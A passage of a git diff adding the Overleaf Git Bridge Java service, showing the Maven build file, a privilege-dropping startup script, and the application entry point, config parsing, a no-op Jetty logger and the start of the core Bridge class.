https://mvnrepository.com/artifact/org.apache.maven.plugins/maven-compiler-plugin --> + <plugin> + <artifactId>maven-compiler-plugin</artifactId> + <version>${maven.compiler.plugin.version}</version> + <configuration> + <source>${java.version}</source> + <target>${java.version}</target> + <release>${java.version}</release> + </configuration> + </plugin> + <!-- Workaround, test loader crashes without this configuration option --> + <!-- See: https://stackoverflow.com/questions/53010200/maven-surefire-could-not-find-forkedbooter-class --> + <plugin> + <groupId>org.apache.maven.plugins</groupId> + <artifactId>maven-surefire-plugin</artifactId> + <version>${maven.surefire.plugin.version}</version> + <configuration> + <argLine>-Djdk.net.URLClassPath.disableClassPathURLCheck=true</argLine> + </configuration> + </plugin> + <!-- https://mvnrepository.com/artifact/org.apache.maven.plugins/maven-assembly-plugin --> + <plugin> + <artifactId>maven-assembly-plugin</artifactId> + <version>${maven.assembly.plugin.version}</version> + <executions> + <execution> + <phase>package</phase> + <goals> + <goal>single</goal> + 
</goals> + </execution> + </executions> + <configuration> + <archive> + <manifest> + <mainClass>uk.ac.ic.wlgitbridge.Main</mainClass> + </manifest> + </archive> + <descriptorRefs> + <descriptorRef>jar-with-dependencies</descriptorRef> + </descriptorRefs> + </configuration> + </plugin> + <plugin> + <groupId>com.spotify.fmt</groupId> + <artifactId>fmt-maven-plugin</artifactId> + <version>${fmt.plugin.version}</version> + </plugin> + </plugins> + </build> + <dependencies> + <!-- https://mvnrepository.com/artifact/junit/junit --> + <dependency> + <groupId>junit</groupId> + <artifactId>junit</artifactId> + <version>${junit.version}</version> + <scope>test</scope> + </dependency> + <!-- https://mvnrepository.com/artifact/org.jmock/jmock-junit4 --> + <dependency> + <groupId>org.jmock</groupId> + <artifactId>jmock-junit4</artifactId> + <version>${jmock.junit4.version}</version> + <scope>test</scope> + </dependency> + <!-- https://mvnrepository.com/artifact/org.eclipse.jetty/jetty-servlet --> + <dependency> + <groupId>org.eclipse.jetty</groupId> + <artifactId>jetty-servlet</artifactId> + <version>${jetty.servlet.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.eclipse.jetty/jetty-server --> + <dependency> + <groupId>org.eclipse.jetty</groupId> + <artifactId>jetty-server</artifactId> + <version>${jetty.servlet.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/com.google.code.gson/gson --> + <dependency> + <groupId>com.google.code.gson</groupId> + <artifactId>gson</artifactId> + <version>${gson.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.asynchttpclient/async-http-client --> + <dependency> + <groupId>org.asynchttpclient</groupId> + <artifactId>async-http-client</artifactId> + <version>${async.http.client.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.eclipse.jgit/org.eclipse.jgit --> + <dependency> + <groupId>org.eclipse.jgit</groupId> + <artifactId>org.eclipse.jgit</artifactId> + <version>${jgit.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.eclipse.jgit/org.eclipse.jgit.http.server --> + <dependency> + <groupId>org.eclipse.jgit</groupId> + <artifactId>org.eclipse.jgit.http.server</artifactId> + <version>${jgit.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.xerial/sqlite-jdbc --> + <dependency> + <groupId>org.xerial</groupId> + <artifactId>sqlite-jdbc</artifactId> + <version>${sqlite.jdbc.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/joda-time/joda-time --> + <dependency> + <groupId>joda-time</groupId> + <artifactId>joda-time</artifactId> + <version>${joda.time.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/com.google.oauth-client/google-oauth-client --> + <dependency> + <groupId>com.google.oauth-client</groupId> + <artifactId>google-oauth-client</artifactId> + <version>${google.oauth.client.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/com.google.http-client/google-http-client --> + <dependency> + <groupId>com.google.http-client</groupId> + <artifactId>google-http-client</artifactId> + <version>${google.http.client.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/com.google.http-client/google-http-client-gson --> + <dependency> + <groupId>com.google.http-client</groupId> + <artifactId>google-http-client-gson</artifactId> + <version>${google.http.client.version}</version> + </dependency> 
+    <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-lang3 -->
+    <dependency>
+      <groupId>org.apache.commons</groupId>
+      <artifactId>commons-lang3</artifactId>
+      <version>${commons.lang3.version}</version>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/ch.qos.logback/logback-classic -->
+    <dependency>
+      <groupId>ch.qos.logback</groupId>
+      <artifactId>logback-classic</artifactId>
+      <version>${logback.classic.version}</version>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/org.mock-server/mockserver-netty -->
+    <dependency>
+      <groupId>org.mock-server</groupId>
+      <artifactId>mockserver-netty</artifactId>
+      <version>${mockserver.version}</version>
+      <scope>test</scope>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/org.mock-server/mockserver-junit-rule -->
+    <dependency>
+      <groupId>org.mock-server</groupId>
+      <artifactId>mockserver-junit-rule</artifactId>
+      <version>${mockserver.version}</version>
+      <scope>test</scope>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/org.mockito/mockito-core -->
+    <dependency>
+      <groupId>org.mockito</groupId>
+      <artifactId>mockito-core</artifactId>
+      <version>${mockito.version}</version>
+      <scope>test</scope>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/com.amazonaws/aws-java-sdk -->
+    <dependency>
+      <groupId>com.amazonaws</groupId>
+      <artifactId>aws-java-sdk-s3</artifactId>
+      <version>${aws.java.sdk.version}</version>
+    </dependency>
+    <!-- API, java.xml.bind module -->
+    <dependency>
+      <groupId>jakarta.xml.bind</groupId>
+      <artifactId>jakarta.xml.bind-api</artifactId>
+      <version>${jakarta.xml.bind.api.version}</version>
+    </dependency>
+
+    <!-- Runtime, com.sun.xml.bind module -->
+    <dependency>
+      <groupId>org.glassfish.jaxb</groupId>
+      <artifactId>jaxb-runtime</artifactId>
+      <version>${jaxb.runtime.version}</version>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/org.apache.httpcomponents/httpclient -->
+    <dependency>
+      <groupId>org.apache.httpcomponents</groupId>
+      <artifactId>httpclient</artifactId>
+      <version>${httpclient.version}</version>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/commons-io/commons-io -->
+    <dependency>
+      <groupId>commons-io</groupId>
+      <artifactId>commons-io</artifactId>
+      <version>${commons.io.version}</version>
+    </dependency>
+    <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-compress -->
+    <dependency>
+      <groupId>org.apache.commons</groupId>
+      <artifactId>commons-compress</artifactId>
+      <version>${commons.compress.version}</version>
+    </dependency>
+    <!-- Prometheus metrics -->
+    <dependency>
+      <groupId>io.prometheus</groupId>
+      <artifactId>simpleclient</artifactId>
+      <version>${simpleclient.version}</version>
+    </dependency>
+    <!-- Hotspot JVM metrics -->
+    <dependency>
+      <groupId>io.prometheus</groupId>
+      <artifactId>simpleclient_hotspot</artifactId>
+      <version>${simpleclient.version}</version>
+    </dependency>
+    <!-- Expose metrics via a servlet -->
+    <dependency>
+      <groupId>io.prometheus</groupId>
+      <artifactId>simpleclient_servlet</artifactId>
+      <version>${simpleclient.version}</version>
+    </dependency>
+    <!-- Required by MockServerClient to load 'sun.security.x509' / 'sun.security.util' -->
+    <dependency>
+      <groupId>org.bouncycastle</groupId>
+      <artifactId>bcprov-jdk15on</artifactId>
+      <version>${bouncycastle.crypto.version}</version>
+      <scope>test</scope>
+    </dependency>
+    <dependency>
+      <groupId>org.bouncycastle</groupId>
+      <artifactId>bcpkix-jdk15on</artifactId>
+
<version>${bouncycastle.crypto.version}</version> + <scope>test</scope> + </dependency> + </dependencies> +</project> diff --git a/services/git-bridge/server-pro-start.sh b/services/git-bridge/server-pro-start.sh new file mode 100755 index 0000000..7a01d2f --- /dev/null +++ b/services/git-bridge/server-pro-start.sh @@ -0,0 +1,12 @@ +#!/bin/bash + +# This script is meant to be run as root when the git bridge starts up in +# Server Pro. It ensures that the data directory is created and owned by the +# "node" user, which is the regular user git bridge runs as. + +ROOT_DIR="${GIT_BRIDGE_ROOT_DIR:-/tmp/wlgb}" +mkdir -p "$ROOT_DIR" +chown node:node "$ROOT_DIR" + +# Drop privileges using setpriv to avoid spawning a new process +exec setpriv --reuid=node --regid=node --init-groups /start.sh diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/Main.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/Main.java new file mode 100644 index 0000000..5e365b8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/Main.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge; + +import java.util.Arrays; +import uk.ac.ic.wlgitbridge.application.GitBridgeApp; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 01/11/14. + */ + +/* + * This is the entry point into the Git Bridge. + * + * It is responsible for creating the {@link GitBridgeApp} and then running it. + * + * The {@link GitBridgeApp} parses args and creates the {@link GitBridgeServer}. + * + * The {@link GitBridgeServer} creates the {@link Bridge}, among other things. + * + * The {@link Bridge} is the heart of the Git Bridge. Start there, and follow + * the links outwards (which lead back to the Git users and the postback from + * the snapshot API) and inwards (which lead into the components of the Git + * Bridge: the configurable repo store, db store, and swap store, along with + * the project lock, the swap job, the snapshot API, the resource cache + * and the postback manager). + */ +public class Main { + + public static void main(String[] args) { + Log.info("Git Bridge started with args: " + Arrays.toString(args)); + try { + new GitBridgeApp(args).run(); + } catch (Throwable t) { + /* So that we get a timestamp */ + Log.error("Fatal exception thrown to top level, exiting: ", t); + System.exit(1); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/GitBridgeApp.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/GitBridgeApp.java new file mode 100644 index 0000000..e3cb952 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/GitBridgeApp.java @@ -0,0 +1,93 @@ +package uk.ac.ic.wlgitbridge.application; + +import java.io.IOException; +import javax.servlet.ServletException; +import uk.ac.ic.wlgitbridge.application.config.Config; +import uk.ac.ic.wlgitbridge.application.exception.ArgsException; +import uk.ac.ic.wlgitbridge.application.exception.ConfigFileException; +import uk.ac.ic.wlgitbridge.server.GitBridgeServer; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 02/11/14. + */ + +/* + * Class that represents the application. Parses arguments and gives them to the + * server, or dies with a usage message. 
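+ *
+ * A usage sketch, mirroring how {@link uk.ac.ic.wlgitbridge.Main} drives this
+ * class (the config path is illustrative):
+ *
+ * <pre>{@code
+ * GitBridgeApp app = new GitBridgeApp(new String[] {"conf/runtime.json"});
+ * app.run();  // starts the GitBridgeServer
+ * }</pre>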
+ */ +public class GitBridgeApp implements Runnable { + + public static final int EXIT_CODE_FAILED = 1; + private static final String USAGE_MESSAGE = "usage: writelatex-git-bridge [config_file]"; + + private String configFilePath; + Config config; + private GitBridgeServer server; + + /* + * Constructs an instance of the WriteLatex-Git Bridge application. + * @param args args from main, which should be in the format [config_file] + */ + public GitBridgeApp(String[] args) { + try { + parseArguments(args); + loadConfigFile(); + Log.info("Config loaded: {}", config.getSanitisedString()); + } catch (ArgsException e) { + printUsage(); + System.exit(EXIT_CODE_FAILED); + } catch (ConfigFileException e) { + Log.error( + "The property for " + e.getMissingMember() + " is invalid. Check your config file."); + System.exit(EXIT_CODE_FAILED); + } catch (IOException e) { + Log.error("Invalid config file. Check the file path."); + System.exit(EXIT_CODE_FAILED); + } + try { + server = new GitBridgeServer(config); + } catch (ServletException e) { + Log.error("Servlet exception when instantiating GitBridgeServer", e); + } + } + + /* + * Starts the server with the port number and root directory path given in + * the command-line arguments. + */ + @Override + public void run() { + server.start(); + } + + public void stop() { + server.stop(); + } + + /* Helper methods */ + + private void parseArguments(String[] args) throws ArgsException { + checkArgumentsLength(args); + parseConfigFilePath(args); + } + + private void checkArgumentsLength(String[] args) throws ArgsException { + if (args.length < 1) { + throw new ArgsException(); + } + } + + private void parseConfigFilePath(String[] args) throws ArgsException { + configFilePath = args[0]; + } + + private void loadConfigFile() throws ConfigFileException, IOException { + Log.info("Loading config file at path: " + configFilePath); + config = new Config(configFilePath); + } + + private void printUsage() { + System.err.println(USAGE_MESSAGE); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/config/Config.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/config/Config.java new file mode 100644 index 0000000..d5b5301 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/config/Config.java @@ -0,0 +1,204 @@ +package uk.ac.ic.wlgitbridge.application.config; + +import com.google.gson.Gson; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.FileReader; +import java.io.IOException; +import java.io.Reader; +import java.util.Optional; +import javax.annotation.Nullable; +import uk.ac.ic.wlgitbridge.application.exception.ConfigFileException; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStoreConfig; +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJobConfig; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStoreConfig; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; +import uk.ac.ic.wlgitbridge.util.Instance; + +/* + * Created by Winston on 05/12/14. 
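+ *
+ * Parses and holds the runtime configuration. A minimal usage sketch (the
+ * constructor throws if the file is missing or a required member is invalid):
+ *
+ * <pre>{@code
+ * Config config = new Config("conf/runtime.json");
+ * int port = config.getPort();
+ * Log.info("Config loaded: {}", config.getSanitisedString());
+ * }</pre>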
+ */ +public class Config implements JSONSource { + + static Config asSanitised(Config config) { + return new Config( + config.port, + config.bindIp, + config.idleTimeout, + config.rootGitDirectory, + config.allowedCorsOrigins, + config.apiBaseURL, + config.postbackURL, + config.serviceName, + config.oauth2Server, + config.userPasswordEnabled, + config.repoStore, + SwapStoreConfig.sanitisedCopy(config.swapStore), + config.swapJob, + config.sqliteHeapLimitBytes); + } + + private int port; + private String bindIp; + private int idleTimeout; + private String rootGitDirectory; + private String[] allowedCorsOrigins; + private String apiBaseURL; + private String postbackURL; + private String serviceName; + @Nullable private String oauth2Server; + private boolean userPasswordEnabled; + @Nullable private RepoStoreConfig repoStore; + @Nullable private SwapStoreConfig swapStore; + @Nullable private SwapJobConfig swapJob; + private int sqliteHeapLimitBytes = 0; + + public Config(String configFilePath) throws ConfigFileException, IOException { + this(new FileReader(configFilePath)); + } + + Config(Reader reader) { + fromJSON(new Gson().fromJson(reader, JsonElement.class)); + } + + public Config( + int port, + String bindIp, + int idleTimeout, + String rootGitDirectory, + String[] allowedCorsOrigins, + String apiBaseURL, + String postbackURL, + String serviceName, + String oauth2Server, + boolean userPasswordEnabled, + RepoStoreConfig repoStore, + SwapStoreConfig swapStore, + SwapJobConfig swapJob, + int sqliteHeapLimitBytes) { + this.port = port; + this.bindIp = bindIp; + this.idleTimeout = idleTimeout; + this.rootGitDirectory = rootGitDirectory; + this.allowedCorsOrigins = allowedCorsOrigins; + this.apiBaseURL = apiBaseURL; + this.postbackURL = postbackURL; + this.serviceName = serviceName; + this.oauth2Server = oauth2Server; + this.userPasswordEnabled = userPasswordEnabled; + this.repoStore = repoStore; + this.swapStore = swapStore; + this.swapJob = swapJob; + this.sqliteHeapLimitBytes = sqliteHeapLimitBytes; + } + + @Override + public void fromJSON(JsonElement json) { + JsonObject configObject = json.getAsJsonObject(); + port = getElement(configObject, "port").getAsInt(); + bindIp = getElement(configObject, "bindIp").getAsString(); + idleTimeout = getElement(configObject, "idleTimeout").getAsInt(); + rootGitDirectory = getElement(configObject, "rootGitDirectory").getAsString(); + String apiBaseURL = getElement(configObject, "apiBaseUrl").getAsString(); + if (!apiBaseURL.endsWith("/")) { + apiBaseURL += "/"; + } + this.apiBaseURL = apiBaseURL; + serviceName = getElement(configObject, "serviceName").getAsString(); + final String rawAllowedCorsOrigins = + getOptionalString(configObject, "allowedCorsOrigins").trim(); + if (rawAllowedCorsOrigins.isEmpty()) { + allowedCorsOrigins = new String[] {}; + } else { + allowedCorsOrigins = rawAllowedCorsOrigins.split(","); + } + postbackURL = getElement(configObject, "postbackBaseUrl").getAsString(); + if (!postbackURL.endsWith("/")) { + postbackURL += "/"; + } + oauth2Server = getOptionalString(configObject, "oauth2Server"); + userPasswordEnabled = getOptionalString(configObject, "userPasswordEnabled").equals("true"); + repoStore = new Gson().fromJson(configObject.get("repoStore"), RepoStoreConfig.class); + swapStore = new Gson().fromJson(configObject.get("swapStore"), SwapStoreConfig.class); + swapJob = new Gson().fromJson(configObject.get("swapJob"), SwapJobConfig.class); + if (configObject.has("sqliteHeapLimitBytes")) { + sqliteHeapLimitBytes = 
getElement(configObject, "sqliteHeapLimitBytes").getAsInt(); + } + } + + public String getSanitisedString() { + return Instance.prettyGson.toJson(Config.asSanitised(this)); + } + + public int getPort() { + return port; + } + + public String getBindIp() { + return bindIp; + } + + public int getIdleTimeout() { + return idleTimeout; + } + + public String getRootGitDirectory() { + return rootGitDirectory; + } + + public int getSqliteHeapLimitBytes() { + return this.sqliteHeapLimitBytes; + } + + public String[] getAllowedCorsOrigins() { + return allowedCorsOrigins; + } + + public String getAPIBaseURL() { + return apiBaseURL; + } + + public String getServiceName() { + return serviceName; + } + + public String getPostbackURL() { + return postbackURL; + } + + public boolean isUserPasswordEnabled() { + return userPasswordEnabled; + } + + public String getOauth2Server() { + return oauth2Server; + } + + public Optional<RepoStoreConfig> getRepoStore() { + return Optional.ofNullable(repoStore); + } + + public Optional<SwapStoreConfig> getSwapStore() { + return Optional.ofNullable(swapStore); + } + + public Optional<SwapJobConfig> getSwapJob() { + return Optional.ofNullable(swapJob); + } + + private JsonElement getElement(JsonObject configObject, String name) { + JsonElement element = configObject.get(name); + if (element == null) { + throw new RuntimeException(new ConfigFileException(name)); + } + return element; + } + + private String getOptionalString(JsonObject configObject, String name) { + JsonElement element = configObject.get(name); + if (element == null || !element.isJsonPrimitive()) { + return ""; + } + return element.getAsString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ArgsException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ArgsException.java new file mode 100644 index 0000000..5717aff --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ArgsException.java @@ -0,0 +1,6 @@ +package uk.ac.ic.wlgitbridge.application.exception; + +/* + * Created by Winston on 03/11/14. + */ +public class ArgsException extends Exception {} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ConfigFileException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ConfigFileException.java new file mode 100644 index 0000000..8e6ac7d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ConfigFileException.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.application.exception; + +/* + * Created by Winston on 05/12/14. + */ +public class ConfigFileException extends Exception { + + private final String missingMember; + + public ConfigFileException(String missingMember) { + this.missingMember = missingMember; + } + + public String getMissingMember() { + return missingMember; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/jetty/NullLogger.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/jetty/NullLogger.java new file mode 100644 index 0000000..4543a59 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/jetty/NullLogger.java @@ -0,0 +1,60 @@ +package uk.ac.ic.wlgitbridge.application.jetty; + +import org.eclipse.jetty.util.log.Logger; + +/* + * Created by Winston on 03/11/14. 
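+ *
+ * A Jetty {@link Logger} that discards all output: every logging method is a
+ * no-op, {@link #isDebugEnabled()} always returns false, and
+ * {@link #getLogger(String)} returns this same instance, so it can be
+ * installed to silence Jetty's default logging.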
+ */ +public class NullLogger implements Logger { + + @Override + public String getName() { + return "null_logger"; + } + + @Override + public void warn(String s, Object... objects) {} + + @Override + public void warn(Throwable throwable) {} + + @Override + public void warn(String s, Throwable throwable) {} + + @Override + public void info(String s, Object... objects) {} + + @Override + public void info(Throwable throwable) {} + + @Override + public void info(String s, Throwable throwable) {} + + @Override + public boolean isDebugEnabled() { + return false; + } + + @Override + public void setDebugEnabled(boolean b) {} + + @Override + public void debug(String s, Object... objects) {} + + @Override + public void debug(String s, long l) {} + + @Override + public void debug(Throwable throwable) {} + + @Override + public void debug(String s, Throwable throwable) {} + + @Override + public Logger getLogger(String s) { + return this; + } + + @Override + public void ignore(Throwable throwable) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/Bridge.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/Bridge.java new file mode 100644 index 0000000..83fbeda --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/Bridge.java @@ -0,0 +1,709 @@ +package uk.ac.ic.wlgitbridge.bridge; + +import com.google.api.client.auth.oauth2.Credential; +import java.io.File; +import java.io.IOException; +import java.sql.Timestamp; +import java.time.LocalDateTime; +import java.util.*; +import org.eclipse.jgit.errors.RepositoryNotFoundException; +import uk.ac.ic.wlgitbridge.application.config.Config; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; +import uk.ac.ic.wlgitbridge.bridge.gc.GcJob; +import uk.ac.ic.wlgitbridge.bridge.gc.GcJobImpl; +import uk.ac.ic.wlgitbridge.bridge.lock.LockGuard; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.*; +import uk.ac.ic.wlgitbridge.bridge.resource.ResourceCache; +import uk.ac.ic.wlgitbridge.bridge.resource.UrlResourceCache; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApi; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApiFacade; +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJob; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.data.ProjectLockImpl; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.data.model.Snapshot; +import uk.ac.ic.wlgitbridge.git.exception.FileLimitExceededException; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.snapshot.base.MissingRepositoryException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotAttachment; +import uk.ac.ic.wlgitbridge.snapshot.push.PostbackManager; +import uk.ac.ic.wlgitbridge.snapshot.push.PushResult; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.*; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * This is the heart of the Git Bridge. 
You plug in all the parts (project
+ * lock, repo store, db store, swap store, snapshot api, resource cache and
+ * postback manager), and it is driven by Git user requests and Overleaf
+ * postback requests.
+ *
+ * Follow these links to go "outward" (to input from Git users and Overleaf):
+ *
+ * 1. JGit hooks, which handle user Git requests:
+ *
+ * @see WLRepositoryResolver - used on all requests to associate a repo with a
+ * project name, or fail
+ *
+ * @see WLUploadPackFactory - used to handle clones and fetches
+ *
+ * @see WLReceivePackFactory - used to handle pushes by setting a hook
+ * @see WriteLatexPutHook - the hook used to handle pushes
+ *
+ * 2. The Postback Servlet, which handles postbacks from the Overleaf app
+ * to confirm that a project is pushed. If a postback is lost, it's fine, we
+ * just update ourselves on the next access.
+ *
+ * @see PostbackHandler - the entry point for postbacks
+ *
+ * Follow these links to go "inward" (to the Git Bridge components):
+ *
+ * 1. The Project Lock, used to synchronise accesses to projects and shut down
+ * the Git Bridge gracefully by preventing further lock acquisition.
+ *
+ * @see ProjectLock - the interface used for the Project Lock
+ * @see ProjectLockImpl - the default concrete implementation
+ *
+ * 2. The Repo Store, used to provide repository objects.
+ *
+ * The default implementation uses Git on the file system.
+ *
+ * @see RepoStore - the interface for the Repo Store
+ * @see FSGitRepoStore - the default concrete implementation
+ * @see ProjectRepo - an interface for an actual repo instance
+ * @see GitProjectRepo - the default concrete implementation
+ *
+ * 3. The DB Store, used to store persistent data such as the latest version
+ * of each project that we have (used for querying the Snapshot API), along
+ * with caching remote blobs.
+ *
+ * The default implementation is SQLite based.
+ *
+ * @see DBStore - the interface for the DB store
+ * @see SqliteDBStore - the default concrete implementation
+ *
+ * 4. The Swap Store, used to swap projects out to when disk usage goes over a
+ * certain threshold.
+ *
+ * The default implementation tarbzips projects to/from Amazon S3.
+ *
+ * @see SwapStore - the interface for the Swap Store
+ * @see S3SwapStore - the default concrete implementation
+ *
+ * 5. The Swap Job, which performs the actual swapping on the swap store based
+ * on various configuration options.
+ *
+ * @see SwapJob - the interface for the Swap Job
+ * @see SwapJobImpl - the default concrete implementation
+ *
+ * 6. The Snapshot API, which provides data from the Overleaf app.
+ *
+ * @see SnapshotApiFacade - wraps a concrete instance of the Snapshot API.
+ * @see SnapshotApi - the interface for the Snapshot API.
+ * @see NetSnapshotApi - the default concrete implementation
+ *
+ * 7. The Resource Cache, which provides the data for attachment resources from
+ * URLs. It will generally fetch from the source on a cache miss.
+ *
+ * The default implementation uses the DB Store to maintain a mapping from
+ * URLs to files in an actual repo.
+ *
+ * @see ResourceCache - the interface for the Resource Cache
+ * @see UrlResourceCache - the default concrete implementation
+ *
+ * 8. The Postback Manager, which keeps track of pending postbacks. It stores a
+ * mapping from project names to postback promises.
+ *
+ * @see PostbackManager - the class
+ * @see PostbackPromise - the object waited on for a postback.
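+ *
+ * Throughout this class, per-project synchronisation uses try-with-resources
+ * over {@link LockGuard}, in this pattern (a sketch; projectName is whatever
+ * project the request touches):
+ *
+ * <pre>{@code
+ * try (LockGuard __ = lock.lockGuard(projectName)) {
+ *   // critical section: the project lock is held until the guard closes
+ * } catch (CannotAcquireLockException e) {
+ *   // the bridge is shutting down and no longer accepts new work
+ * }
+ * }</pre>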
+ * + */ +public class Bridge { + + private final Config config; + + private final ProjectLock lock; + + private final RepoStore repoStore; + private final DBStore dbStore; + private final SwapStore swapStore; + private final SwapJob swapJob; + private final GcJob gcJob; + + private final SnapshotApiFacade snapshotAPI; + private final ResourceCache resourceCache; + + private final PostbackManager postbackManager; + + /* + * Creates a Bridge from its configurable parts, which are the repo, db and + * swap store, and the swap job config. + * + * This should be the method used to create a Bridge. + * @param config The config to use + * @param repoStore The repo store to use + * @param dbStore The db store to use + * @param swapStore The swap store to use + * @param snapshotApi The snapshot api to use + * @return The constructed Bridge. + */ + public static Bridge make( + Config config, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore, + SnapshotApi snapshotApi) { + ProjectLock lock = + new ProjectLockImpl((int threads) -> Log.info("Waiting for " + threads + " projects...")); + return new Bridge( + config, + lock, + repoStore, + dbStore, + swapStore, + SwapJob.fromConfig(config.getSwapJob(), lock, repoStore, dbStore, swapStore), + new GcJobImpl(repoStore, lock), + new SnapshotApiFacade(snapshotApi), + new UrlResourceCache(dbStore)); + } + + /* + * Creates a bridge from all of its components, not just its configurable + * parts. This is for substituting mock/stub components for testing. + * It's also used by Bridge.make to actually construct the bridge. + * @param lock the {@link ProjectLock} to use + * @param repoStore the {@link RepoStore} to use + * @param dbStore the {@link DBStore} to use + * @param swapStore the {@link SwapStore} to use + * @param swapJob the {@link SwapJob} to use + * @param gcJob + * @param snapshotAPI the {@link SnapshotApi} to use + * @param resourceCache the {@link ResourceCache} to use + */ + Bridge( + Config config, + ProjectLock lock, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore, + SwapJob swapJob, + GcJob gcJob, + SnapshotApiFacade snapshotAPI, + ResourceCache resourceCache) { + this.config = config; + this.lock = lock; + this.repoStore = repoStore; + this.dbStore = dbStore; + this.swapStore = swapStore; + this.snapshotAPI = snapshotAPI; + this.resourceCache = resourceCache; + this.swapJob = swapJob; + this.gcJob = gcJob; + postbackManager = new PostbackManager(); + Runtime.getRuntime().addShutdownHook(new Thread(this::doShutdown)); + repoStore.purgeNonexistentProjects(dbStore.getProjectNames()); + } + + /* + * This performs the graceful shutdown of the Bridge, which is called by the + * shutdown hook. It acquires the project write lock, which prevents + * work being done for new projects (which acquire the read lock). + * Once it has the write lock, there are no readers left, so the git bridge + * can shut down gracefully. + * + * It is also used by the tests. + */ + void doShutdown() { + Log.info("Shutdown received."); + Log.info("Stopping SwapJob"); + swapJob.stop(); + Log.info("Stopping GcJob"); + gcJob.stop(); + Log.info("Waiting for projects"); + lock.lockAll(); + Log.info("Bye"); + } + + /* + * Starts the swap job, which will begin checking whether projects should be + * swapped with a configurable frequency. 
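+ * It also starts the GC job, which garbage-collects repositories that are
+ * queued for GC after a successful push.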
